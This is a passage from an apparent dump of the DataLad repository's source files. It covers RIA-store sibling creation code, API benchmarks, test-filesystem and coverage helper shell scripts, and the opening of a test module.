4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Create a sibling in a RIA store\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom pathlib import PurePosixPath as UrlPath\n\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.core.distributed.clone import decode_source_spec\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n verify_ria_url,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n RemoteCommandFailedError,\n RIARemoteError,\n SSHRemoteIO,\n)\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.distribution.utils import _yield_ds_w_matching_siblings\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.log import log_progress\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n 
EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import url_path2local_path\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n quote_cmdlinearg,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_ria')\n\n\n@build_doc\nclass CreateSiblingRia(Interface):\n \"\"\"Creates a sibling to a dataset in a RIA store\n\n Communication with a dataset in a RIA store is implemented via two\n siblings. A regular Git remote (repository sibling) and a git-annex\n special remote for data transfer (storage sibling) -- with the former\n having a publication dependency on the latter. By default, the name of the\n storage sibling is derived from the repository sibling's name by appending\n \"-storage\".\n\n The store's base path is expected to not exist, be an empty directory,\n or a valid RIA store.\n\n Notes\n -----\n\n\n **RIA URL format**\n\n Interactions with new or existing RIA stores require RIA URLs to identify\n the store or specific datasets inside of it.\n\n The general structure of a RIA URL pointing to a store takes the form\n ``ria+[scheme]://<storelocation>`` (e.g.,\n ``ria+ssh://[user@]hostname:/absolute/path/to/ria-store``, or\n ``ria+file:///absolute/path/to/ria-store``)\n\n The general structure of a RIA URL pointing to a dataset in a store (for\n example for cloning) takes a similar form, but appends either the datasets\n UUID or a \"~\" symbol followed by the dataset's alias name:\n ``ria+[scheme]://<storelocation>#<dataset-UUID>`` or\n ``ria+[scheme]://<storelocation>#~<aliasname>``.\n In addition, specific version identifiers can be appended to the URL with an\n additional \"@\" symbol:\n ``ria+[scheme]://<storelocation>#<dataset-UUID>@<dataset-version>``,\n where ``dataset-version`` refers to a branch or tag.\n\n\n **RIA store layout**\n\n A RIA store is a directory tree with a dedicated subdirectory for each\n dataset in the store. The subdirectory name is constructed from the\n DataLad dataset ID, e.g. ``124/68afe-59ec-11ea-93d7-f0d5bf7b5561``, where\n the first three characters of the ID are used for an intermediate\n subdirectory in order to mitigate files system limitations for stores\n containing a large number of datasets.\n\n By default, a dataset in a RIA store consists of two components:\n A Git repository (for all dataset contents stored in Git) and a\n storage sibling (for dataset content stored in git-annex).\n\n It is possible to selectively disable either component using\n ``storage-sibling 'off'`` or ``storage-sibling 'only'``, respectively.\n If neither component is disabled, a dataset's subdirectory layout in a RIA\n store contains a standard bare Git repository and an ``annex/`` subdirectory\n inside of it.\n The latter holds a Git-annex object store and comprises the storage sibling.\n Disabling the standard git-remote (``storage-sibling='only'``) will result\n in not having the bare git repository, disabling the storage sibling\n (``storage-sibling='off'``) will result in not having the ``annex/``\n subdirectory.\n\n Optionally, there can be a further subdirectory ``archives`` with\n (compressed) 7z archives of annex objects. The storage remote is able to\n pull annex objects from these archives, if it cannot find in the regular\n annex object store. 
This feature can be useful for storing large\n collections of rarely changing data on systems that limit the number of\n files that can be stored.\n\n Each dataset directory also contains a ``ria-layout-version`` file that\n identifies the data organization (as, for example, described above).\n\n Lastly, there is a global ``ria-layout-version`` file at the store's\n base path that identifies where dataset subdirectories themselves are\n located. At present, this file must contain a single line stating the\n version (currently \"1\"). This line MUST end with a newline character.\n\n It is possible to define an alias for an individual dataset in a store by\n placing a symlink to the dataset location into an ``alias/`` directory\n in the root of the store. This enables dataset access via URLs of format:\n ``ria+<protocol>://<storelocation>#~<aliasname>``.\n\n Compared to standard git-annex object stores, the ``annex/`` subdirectories\n used as storage siblings follow a different layout naming scheme\n ('dirhashmixed' instead of 'dirhashlower').\n This is mostly noted as a technical detail, but also serves to remind\n git-annex powerusers to refrain from running git-annex commands\n directly in-store as it can cause severe damage due to the layout\n difference. Interactions should be handled via the ORA special remote\n instead.\n\n\n **Error logging**\n\n To enable error logging at the remote end, append a pipe symbol and an \"l\"\n to the version number in ria-layout-version (like so: ``1|l\\\\n``).\n\n Error logging will create files in an \"error_log\" directory whenever the\n git-annex special remote (storage sibling) raises an exception, storing the\n Python traceback of it. The logfiles are named according to the scheme\n ``<dataset id>.<annex uuid of the remote>.log`` showing \"who\" ran into this\n issue with which dataset. Because logging can potentially leak personal\n data (like local file paths for example), it can be disabled client-side\n by setting the configuration variable\n ``annex.ora-remote.<storage-sibling-name>.ignore-remote-config``.\n \"\"\"\n\n # TODO: description?\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to process. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n url=Parameter(\n args=(\"url\",),\n metavar=\"ria+<ssh|file|http(s)>://<host>[/path]\",\n doc=\"\"\"URL identifying the target RIA store and access protocol. If\n ``push_url||--push-url`` is given in addition, this is\n used for read access only. Otherwise it will be used for write\n access too and to create the repository sibling in the RIA store.\n Note, that HTTP(S) currently is valid for consumption only thus\n requiring to provide ``push_url||--push-url``.\n \"\"\",\n constraints=EnsureStr() | EnsureNone()),\n push_url=Parameter(\n args=(\"--push-url\",),\n metavar=\"ria+<ssh|file>://<host>[/path]\",\n doc=\"\"\"URL identifying the target RIA store and access protocol for\n write access to the storage sibling. 
If given this will also be used\n for creation of the repository sibling in the RIA store.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"Name of the sibling.\n With `recursive`, the same name will be used to label all\n the subdatasets' siblings.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n required=True),\n storage_name=Parameter(\n args=(\"--storage-name\",),\n metavar=\"NAME\",\n doc=\"\"\"Name of the storage sibling (git-annex special remote).\n Must not be identical to the sibling name. If not specified,\n defaults to the sibling name plus '-storage' suffix. If only\n a storage sibling is created, this setting is ignored, and\n the primary sibling name is used.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n alias=Parameter(\n args=('--alias',),\n metavar='ALIAS',\n doc=\"\"\"Alias for the dataset in the RIA store.\n Add the necessary symlink so that this dataset can be cloned from the RIA\n store using the given ALIAS instead of its ID.\n With `recursive=True`, only the top dataset will be aliased.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n post_update_hook=Parameter(\n args=(\"--post-update-hook\",),\n doc=\"\"\"Enable Git's default post-update-hook for the created\n sibling. This is useful when the sibling is made accessible via a\n \"dumb server\" that requires running 'git update-server-info'\n to let Git interact properly with it.\"\"\",\n action=\"store_true\"),\n shared=Parameter(\n args=(\"--shared\",),\n metavar='{false|true|umask|group|all|world|everybody|0xxx}',\n doc=\"\"\"If given, configures the permissions in the\n RIA store for multi-users access.\n Possible values for this option are identical to those of\n `git init --shared` and are described in its documentation.\"\"\",\n constraints=EnsureStr() | EnsureBool() | EnsureNone()),\n group=Parameter(\n args=(\"--group\",),\n metavar=\"GROUP\",\n doc=\"\"\"Filesystem group for the repository. Specifying the group is\n crucial when [CMD: --shared=group CMD][PY: shared=\"group\" PY]\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n storage_sibling=Parameter(\n args=(\"--storage-sibling\",),\n dest='storage_sibling',\n metavar='MODE',\n constraints=EnsureChoice('only') | EnsureBool() | EnsureNone(),\n doc=\"\"\"By default, an ORA storage sibling and a Git repository\n sibling are created ([CMD: on CMD][PY: True|'on' PY]).\n Alternatively, creation of the storage sibling can be disabled\n ([CMD: off CMD][PY: False|'off' PY]), or a storage sibling\n created only and no Git sibling\n ([CMD: only CMD][PY: 'only' PY]). In the latter mode, no Git\n installation is required on the target host.\"\"\"),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure'),\n metavar='MODE',\n doc=\"\"\"Action to perform, if a (storage) sibling is already\n configured under the given name and/or a target already exists.\n In this case, a dataset can be skipped ('skip'), an existing target\n repository be forcefully re-initialized, and the sibling\n (re-)configured ('reconfigure'), or the command be instructed to\n fail ('error').\"\"\", ),\n new_store_ok=Parameter(\n args=(\"--new-store-ok\",),\n action='store_true',\n doc=\"\"\"When set, a new store will be created, if necessary. 
Otherwise, a sibling\n will only be created if the url points to an existing RIA store.\"\"\",\n ),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n trust_level=Parameter(\n args=(\"--trust-level\",),\n metavar=\"TRUST-LEVEL\",\n constraints=EnsureChoice('trust', 'semitrust', 'untrust', None),\n doc=\"\"\"specify a trust level for the storage sibling. If not\n specified, the default git-annex trust level is used. 'trust'\n should be used with care (see the git-annex-trust man page).\"\"\",),\n disable_storage__=Parameter(\n args=(\"--no-storage-sibling\",),\n dest='disable_storage__',\n doc=\"\"\"This option is deprecated. Use '--storage-sibling off'\n instead.\"\"\",\n action=\"store_false\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_ria')\n @eval_results\n def __call__(url,\n name,\n *, # note that `name` is required but not posarg in CLI\n dataset=None,\n storage_name=None,\n alias=None,\n post_update_hook=False,\n shared=None,\n group=None,\n storage_sibling=True,\n existing='error',\n new_store_ok=False,\n trust_level=None,\n recursive=False,\n recursion_limit=None,\n disable_storage__=None,\n push_url=None\n ):\n if disable_storage__ is not None:\n import warnings\n warnings.warn(\"datalad-create-sibling-ria --no-storage-sibling \"\n \"is deprecated, use --storage-sibling off instead.\",\n DeprecationWarning)\n # recode to new setup\n disable_storage__ = None\n storage_sibling = False\n\n if storage_sibling == 'only' and storage_name:\n lgr.warning(\n \"Sibling name will be used for storage sibling in \"\n \"storage-sibling-only mode, but a storage sibling name \"\n \"was provided\"\n )\n\n ds = require_dataset(\n dataset, check_installed=True, purpose='create RIA sibling(s)')\n res_kwargs = dict(\n ds=ds,\n action=\"create-sibling-ria\",\n logger=lgr,\n )\n\n # parse target URL\n # Note: URL parsing is done twice ATM (for top-level ds). This can't be\n # reduced to single instance, since rewriting url based on config could\n # be different for subdatasets.\n try:\n ssh_host, url_base_path, rewritten_url = \\\n verify_ria_url(push_url if push_url else url, ds.config)\n except ValueError as e:\n yield get_status_dict(\n status='error',\n message=str(e),\n **res_kwargs\n )\n return\n\n local_base_path = Path(url_path2local_path(url_base_path))\n\n if ds.repo.get_hexsha() is None or ds.id is None:\n raise RuntimeError(\n \"Repository at {} is not a DataLad dataset, \"\n \"run 'datalad create [--force]' first.\".format(ds.path))\n\n if not storage_sibling and storage_name:\n lgr.warning(\n \"Storage sibling setup disabled, but a storage sibling name \"\n \"was provided\"\n )\n\n if storage_sibling and not storage_name:\n storage_name = \"{}-storage\".format(name)\n\n if storage_sibling and name == storage_name:\n # leads to unresolvable, circular dependency with publish-depends\n raise ValueError(\"sibling names must not be equal\")\n\n if not isinstance(url, str):\n raise TypeError(\"url is not a string, but %s\" % type(url))\n\n # Query existing siblings upfront in order to fail early on\n # existing=='error', since misconfiguration (particularly of special\n # remotes) only to fail in a subdataset later on with that config, can\n # be quite painful.\n # TODO: messages - this is \"create-sibling\". 
Don't confuse existence of\n # local remotes with existence of the actual remote sibling\n # in wording\n if existing == 'error':\n failed = False\n for dpath, sname in _yield_ds_w_matching_siblings(\n ds,\n (name, storage_name),\n recursive=recursive,\n recursion_limit=recursion_limit):\n res = get_status_dict(\n status='error',\n message=(\n \"a sibling %r is already configured in dataset %r\",\n sname, dpath),\n type='sibling',\n name=sname,\n **res_kwargs,\n )\n failed = True\n yield res\n if failed:\n return\n # TODO: - URL parsing + store creation needs to be RF'ed based on\n # command abstractions\n # - more generally consider store creation a dedicated command or\n # option\n\n io = SSHRemoteIO(ssh_host) if ssh_host else LocalIO()\n try:\n # determine the existence of a store by trying to read its layout.\n # Because this raises a FileNotFound error if non-existent, we need\n # to catch it\n io.read_file(local_base_path / 'ria-layout-version')\n except (FileNotFoundError, RIARemoteError, RemoteCommandFailedError) as e:\n if not new_store_ok:\n # we're instructed to only act in case of an existing RIA store\n res = get_status_dict(\n status='error',\n message=\"No store found at '{}'. Forgot \"\n \"--new-store-ok ?\".format(local_base_path),\n **res_kwargs)\n yield res\n return\n\n log_progress(\n lgr.info, 'create-sibling-ria',\n 'Creating a new RIA store at %s', local_base_path,\n )\n create_store(io, local_base_path, '1')\n\n yield from _create_sibling_ria(\n ds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n alias,\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs)\n\n if recursive:\n # Note: subdatasets can be treated independently, so go full\n # recursion when querying for them and _no_recursion with the\n # actual call. Theoretically this can be parallelized.\n\n for subds in ds.subdatasets(state='present',\n recursive=True,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n result_xfm='datasets'):\n yield from _create_sibling_ria(\n subds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n None, # subdatasets can't have the same alias as the parent\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs)\n\n\ndef _create_sibling_ria(\n ds,\n url,\n push_url,\n name,\n storage_sibling,\n storage_name,\n alias,\n existing,\n shared,\n group,\n post_update_hook,\n trust_level,\n res_kwargs):\n # be safe across datasets\n res_kwargs = res_kwargs.copy()\n # update dataset\n res_kwargs['ds'] = ds\n\n if not isinstance(ds.repo, AnnexRepo):\n # No point in dealing with a special remote when there's no annex.\n # Note, that in recursive invocations this might only apply to some of\n # the datasets. Therefore dealing with it here rather than one level up.\n lgr.debug(\"No annex at %s. 
Ignoring special remote options.\", ds.path)\n storage_sibling = False\n storage_name = None\n\n # parse target URL\n try:\n ssh_host, url_base_path, rewritten_url = \\\n verify_ria_url(push_url if push_url else url, ds.config)\n except ValueError as e:\n yield get_status_dict(\n status='error',\n message=str(e),\n **res_kwargs\n )\n return\n\n local_base_path = Path(url_path2local_path(url_base_path))\n\n git_url = decode_source_spec(\n # append dataset id to url and use magic from clone-helper:\n url + '#{}'.format(ds.id),\n cfg=ds.config\n )['giturl']\n git_push_url = decode_source_spec(\n push_url + '#{}'.format(ds.id),\n cfg=ds.config\n )['giturl'] if push_url else None\n\n # determine layout locations; go for a v1 store-level layout\n repo_path, _, _ = get_layout_locations(1, local_base_path, ds.id)\n\n ds_siblings = [\n r['name'] for r in ds.siblings(\n result_renderer='disabled',\n return_type='generator')\n ]\n # Figure whether we are supposed to skip this very dataset\n if existing == 'skip' and (\n name in ds_siblings or (\n storage_name and storage_name in ds_siblings)):\n yield get_status_dict(\n status='notneeded',\n message=\"Skipped on existing sibling\",\n **res_kwargs\n )\n # if we skip here, nothing else can change that decision further\n # down\n return\n\n # figure whether we need to skip or error due an existing target repo before\n # we try to init a special remote.\n if ssh_host:\n from datalad import ssh_manager\n ssh = ssh_manager.get_connection(\n ssh_host,\n use_remote_annex_bundle=False)\n ssh.open()\n\n exists = False\n if existing in ['skip', 'error', 'reconfigure']:\n config_path = repo_path / 'config'\n # No .git -- if it's an existing repo in a RIA store it should be a\n # bare repo.\n # Theoretically we could have additional checks for whether we have\n # an empty repo dir or a non-bare repo or whatever else.\n if ssh_host:\n try:\n ssh('[ -e {p} ]'.format(p=quote_cmdlinearg(str(config_path))))\n exists = True\n except CommandError:\n exists = False\n else:\n exists = config_path.exists()\n\n if exists:\n if existing == 'skip':\n # 1. not rendered by default\n # 2. 
message doesn't show up in ultimate result\n # record as shown by -f json_pp\n yield get_status_dict(\n status='notneeded',\n message=\"Skipped on existing remote \"\n \"directory {}\".format(repo_path),\n **res_kwargs\n )\n return\n elif existing == 'error':\n yield get_status_dict(\n status='error',\n message=\"remote directory {} already \"\n \"exists.\".format(repo_path),\n **res_kwargs\n )\n return\n else:\n # reconfigure will be handled later in the code\n pass\n\n if storage_sibling == 'only':\n lgr.info(\"create storage sibling '%s' ...\", name)\n else:\n lgr.info(\"create sibling%s '%s'%s ...\",\n 's' if storage_name else '',\n name,\n \" and '{}'\".format(storage_name) if storage_name else '',\n )\n create_ds_in_store(SSHRemoteIO(ssh_host) if ssh_host else LocalIO(),\n local_base_path, ds.id, '2', '1', alias,\n init_obj_tree=storage_sibling is not False)\n if storage_sibling:\n # we are using the main `name`, if the only thing we are creating\n # is the storage sibling\n srname = name if storage_sibling == 'only' else storage_name\n\n lgr.debug('init special remote %s', srname)\n special_remote_options = [\n 'type=external',\n 'externaltype=ora',\n 'encryption=none',\n 'autoenable=true',\n 'url={}'.format(url)]\n if push_url:\n special_remote_options.append('push-url={}'.format(push_url))\n try:\n ds.repo.init_remote(\n srname,\n options=special_remote_options)\n except CommandError as e:\n if existing == 'reconfigure' \\\n and 'There is already a special remote' \\\n in e.stderr:\n # run enableremote instead\n lgr.debug(\n \"special remote '%s' already exists. \"\n \"Run enableremote instead.\",\n srname)\n # TODO: Use AnnexRepo.enable_remote (which needs to get\n # `options` first)\n ds.repo.call_annex([\n 'enableremote',\n srname] + special_remote_options)\n else:\n yield get_status_dict(\n status='error',\n message=\"initremote failed.\\nstdout: %s\\nstderr: %s\"\n % (e.stdout, e.stderr),\n **res_kwargs\n )\n return\n\n if trust_level:\n trust_cmd = [trust_level]\n if trust_level == 'trust':\n # Following git-annex 8.20201129-73-g6a0030a11, using `git\n # annex trust` requires --force.\n trust_cmd.append('--force')\n ds.repo.call_annex(trust_cmd + [srname])\n # get uuid for use in bare repo's config\n uuid = ds.config.get(\"remote.{}.annex-uuid\".format(srname))\n\n if storage_sibling == 'only':\n # we can stop here, the rest of the function is about setting up\n # the git remote part of the sibling\n yield get_status_dict(\n status='ok',\n **res_kwargs,\n )\n return\n\n # 2. create a bare repository in-store:\n\n lgr.debug(\"init bare repository\")\n # TODO: we should prob. check whether it's there already. 
How?\n # Note: like the special remote itself, we assume local FS if no\n # SSH host is specified\n disabled_hook = repo_path / 'hooks' / 'post-update.sample'\n enabled_hook = repo_path / 'hooks' / 'post-update'\n\n if group:\n chgrp_cmd = \"chgrp -R {} {}\".format(\n quote_cmdlinearg(str(group)),\n quote_cmdlinearg(str(repo_path)))\n\n if ssh_host:\n ssh('cd {rootdir} && git init --bare{shared}'.format(\n rootdir=quote_cmdlinearg(str(repo_path)),\n shared=\" --shared='{}'\".format(\n quote_cmdlinearg(shared)) if shared else ''\n ))\n\n if storage_sibling:\n # write special remote's uuid into git-config, so clone can\n # which one it is supposed to be and enable it even with\n # fallback URL\n ssh(\"cd {rootdir} && git config datalad.ora-remote.uuid {uuid}\"\n \"\".format(rootdir=quote_cmdlinearg(str(repo_path)),\n uuid=uuid))\n\n if post_update_hook:\n ssh('mv {} {}'.format(quote_cmdlinearg(str(disabled_hook)),\n quote_cmdlinearg(str(enabled_hook))))\n\n if group:\n # Either repository existed before or a new directory was\n # created for it, set its group to a desired one if was\n # provided with the same chgrp\n ssh(chgrp_cmd)\n\n # finally update server\n if post_update_hook:\n # Conditional on post_update_hook, since one w/o the other doesn't\n # seem to make much sense.\n ssh('cd {rootdir} && git update-server-info'.format(\n rootdir=quote_cmdlinearg(str(repo_path))\n ))\n else:\n gr = GitRepo(repo_path, create=True, bare=True,\n shared=shared if shared else None)\n if exists and existing == 'reconfigure':\n # if the repo exists at the given path, the GitRepo would not\n # (re)-run git init, and just return an instance of GitRepo;\n # skip & error have been handled at this point\n gr.init(\n sanity_checks=False,\n init_options=[\"--bare\"] + ([f\"--shared={shared}\"] if shared else []),\n )\n if storage_sibling:\n # write special remote's uuid into git-config, so clone can\n # which one it is supposed to be and enable it even with\n # fallback URL\n gr.config.add(\"datalad.ora-remote.uuid\", uuid, scope='local')\n\n if post_update_hook:\n disabled_hook.rename(enabled_hook)\n if group:\n # No CWD needed here, since `chgrp` is expected to be found via PATH\n # and the path it's operating on is absolute (repo_path). No\n # repository operation involved.\n Runner().run(chgrp_cmd)\n # finally update server\n if post_update_hook:\n # Conditional on post_update_hook, since one w/o the other doesn't\n # seem to make much sense.\n gr.call_git([\"update-server-info\"])\n\n # add a git remote to the bare repository\n # Note: needs annex-ignore! Otherwise we might push into dirhash\n # lower annex/object tree instead of mixed, since it's a bare\n # repo. This in turn would be an issue, if we want to pack the\n # entire thing into an archive. 
Special remote will then not be\n # able to access content in the \"wrong\" place within the archive\n lgr.debug(\"set up git remote\")\n if name in ds_siblings:\n # otherwise we should have skipped or failed before\n assert existing == 'reconfigure'\n ds.config.set(\n \"remote.{}.annex-ignore\".format(name),\n value=\"true\",\n scope=\"local\")\n yield from ds.siblings(\n 'configure',\n name=name,\n url=str(repo_path) if url.startswith(\"ria+file\") else git_url,\n pushurl=git_push_url,\n recursive=False,\n # Note, that this should be None if storage_sibling was not set\n publish_depends=storage_name,\n result_renderer='disabled',\n return_type='generator',\n # Note, that otherwise a subsequent publish will report\n # \"notneeded\".\n fetch=True\n )\n\n yield get_status_dict(\n status='ok',\n **res_kwargs,\n )\n" }, { "alpha_fraction": 0.6332270503044128, "alphanum_fraction": 0.6372861862182617, "avg_line_length": 27.741666793823242, "blob_id": "3f9eee88397a24716e236f15383d24e9a1f11c7e", "content_id": "0dbbca320005bce2251af919723cd588fac8f23f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3449, "license_type": "permissive", "max_line_length": 99, "num_lines": 120, "path": "/benchmarks/api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks of the datalad.api functionality\"\"\"\n\nfrom os.path import join as opj\n\nfrom datalad.api import create\nfrom datalad.api import create_test_dataset\nfrom datalad.api import install\nfrom datalad.api import ls\nfrom datalad.api import drop\n\n#\n# Following ones could be absent in older versions\n#\ntry:\n from datalad.api import diff\nexcept ImportError:\n diff = None\n\ntry:\n from datalad.api import status\nexcept ImportError:\n status = None\n\n\n# Some tracking example -- may be we should track # of datasets.datalad.org\n#import gc\n#def track_num_objects():\n# return len(gc.get_objects())\n#track_num_objects.unit = \"objects\"\n\n\nfrom .common import (\n SampleSuperDatasetBenchmarks,\n SuprocBenchmarks,\n)\n\n\nclass testds(SuprocBenchmarks):\n \"\"\"\n Benchmarks to test on create_test_dataset how fast we could generate datasets\n \"\"\"\n\n def time_create_test_dataset1(self):\n self.remove_paths.extend(\n create_test_dataset(spec='1', seed=0)\n )\n\n def time_create_test_dataset2x2(self):\n self.remove_paths.extend(\n create_test_dataset(spec='2/2', seed=0)\n )\n\n\nclass supers(SampleSuperDatasetBenchmarks):\n \"\"\"\n Benchmarks on common operations on collections of datasets using datalad API\n \"\"\"\n\n def time_installr(self):\n # somewhat duplicating setup but lazy to do different one for now\n assert install(self.ds.path + '_', source=self.ds.path, recursive=True)\n\n def time_createadd(self):\n assert self.ds.create('newsubds')\n\n def time_createadd_to_dataset(self):\n subds = create(opj(self.ds.path, 'newsubds'))\n self.ds.save(subds.path)\n\n def time_ls(self):\n ls(self.ds.path)\n\n def time_ls_recursive(self):\n ls(self.ds.path, recursive=True)\n\n def time_ls_recursive_long_all(self):\n ls(self.ds.path, recursive=True, long_=True, all_=True)\n\n def time_subdatasets(self):\n self.ds.subdatasets()\n\n def 
time_subdatasets_with_all_paths_recursive(self):\n # to see if we do not get O(N^2) performance\n subdatasets = self.ds.subdatasets(recursive=True, result_xfm='relpaths')\n subdatasets2 = self.ds.subdatasets(path=subdatasets, recursive=True, result_xfm='relpaths')\n assert subdatasets == subdatasets2\n\n def time_subdatasets_recursive(self):\n self.ds.subdatasets(recursive=True)\n\n def time_subdatasets_recursive_first(self):\n next(self.ds.subdatasets(recursive=True, return_type='generator'))\n\n def time_uninstall(self):\n for subm in self.ds.repo.get_submodules_():\n self.ds.drop(subm[\"path\"], recursive=True, what='all',\n reckless='kill')\n\n def time_remove(self):\n drop(self.ds.path, what='all', reckless='kill', recursive=True)\n\n def time_diff(self):\n diff(self.ds.path, revision=\"HEAD^\")\n\n def time_diff_recursive(self):\n diff(self.ds.path, revision=\"HEAD^\", recursive=True)\n\n # Status must be called with the dataset, unlike diff\n def time_status(self):\n self.ds.status()\n\n def time_status_recursive(self):\n self.ds.status(recursive=True)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6779026389122009, "avg_line_length": 21.885713577270508, "blob_id": "4ed02193a49619f1b15d13a522d71588e778aeca", "content_id": "a96d257ab02e6cbfab11e4c1b07fbf10a73dc72b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 801, "license_type": "permissive", "max_line_length": 78, "num_lines": 35, "path": "/tools/eval_under_testloopfs", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Evaluate given command while running with DATALAD_TESTS_TEMP_DIR pointing to\n# that temporary filesystem mounted using loop device\n\nset -e\n\nfs=${DATALAD_TESTS_TEMP_FS:-vfat}\nsize=${DATALAD_TESTS_TEMP_FSSIZE:-10}\n\nset -u\ntmp=$(mktemp -u \"${TMPDIR:-/tmp}/datalad-fs-XXXXX\")\n\necho \"I: $fs of $size: $tmp\"\n\nuid=$(id -u)\nmntimage=\"$tmp.img\"\nmntpoint=\"$tmp\"\n\ndd if=/dev/zero \"of=$mntimage\" bs=1032192c \"count=$size\"\nloop=$(sudo losetup --find --show \"$mntimage\")\nsudo \"mkfs.$fs\" \"$loop\"\nmkdir -p \"$mntpoint\"\nsudo mount -o \"uid=$uid\" \"$loop\" \"$mntpoint\"\n\n# Run the actual command\necho \"I: running $*\"\nset +e\nTMPDIR=\"$mntpoint\" DATALAD_TESTS_TEMP_DIR=\"$mntpoint\" \"$@\"\nret=$?\n\necho \"I: done, unmounting\"\nsudo umount \"$mntpoint\"\nsudo losetup -d \"$loop\"\nrm -rf \"$mntpoint\" \"$mntimage\"\nexit \"$ret\"\n" }, { "alpha_fraction": 0.7039626836776733, "alphanum_fraction": 0.7086247205734253, "avg_line_length": 27.600000381469727, "blob_id": "96db835a0364045265e97b9e10c94bbfd7e761cc", "content_id": "3228ea6360f50de291c739d775d7bb1fc50f63de", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 858, "license_type": "permissive", "max_line_length": 95, "num_lines": 30, "path": "/tools/coverage-bin/datalad", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A little helper to overload default datalad executables with the one ran\n# through coverage\n\nset -eu\n\nbin=$(basename $0)\ncurbin=$(which \"$bin\")\ncurdatalad=$(which datalad)\ncurdir=$(dirname $curdatalad)\n\nCOVERAGE_RUN=\"-m coverage run\"\nexport COVERAGE_PROCESS_START=$PWD/../.coveragerc\nexport PYTHONPATH=\"$PWD/../tools/coverage-bin/\"\nexport PATH=${PATH//$curdir:/}\nnewdatalad=$(which datalad)\nnewbin=$(which $bin)\nnewpython=$(sed -ne '1s/#!//gp' $newdatalad)\n\nif 
[ $newdatalad = $curdatalad ]; then\n echo \"E: binary remained the same: $newdatalad\" >&2\n exit 1\nfi\n\ntouch /tmp/coverages\nexport COVERAGE_FILE=/tmp/.coverage-entrypoints-$RANDOM\necho \"Running now $newpython $COVERAGE_RUN --include=datalad/* -a $newbin $@\" >> /tmp/coverages\n#$newpython $COVERAGE_RUN --include=datalad/* -a $newbin \"$@\"\n$newpython $COVERAGE_RUN -a $newbin \"$@\"\n" }, { "alpha_fraction": 0.6317383646965027, "alphanum_fraction": 0.6347668170928955, "avg_line_length": 35.28571319580078, "blob_id": "7e59cf6c9afe62935289605709310e7e632c8a99", "content_id": "30b782186c0567bc30cb6fe83e58d3994d27e585", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3302, "license_type": "permissive", "max_line_length": 92, "num_lines": 91, "path": "/datalad/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport os.path as op\nimport sys\nfrom unittest.mock import patch\n\nfrom datalad.cmd import WitlessRunner, StdOutErrCapture\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_raises,\n chpwd,\n get_dataset_root,\n ok_file_has_content,\n swallow_logs,\n with_tree,\n)\nfrom datalad.utils import get_home_envvars\n\n\n# verify that any 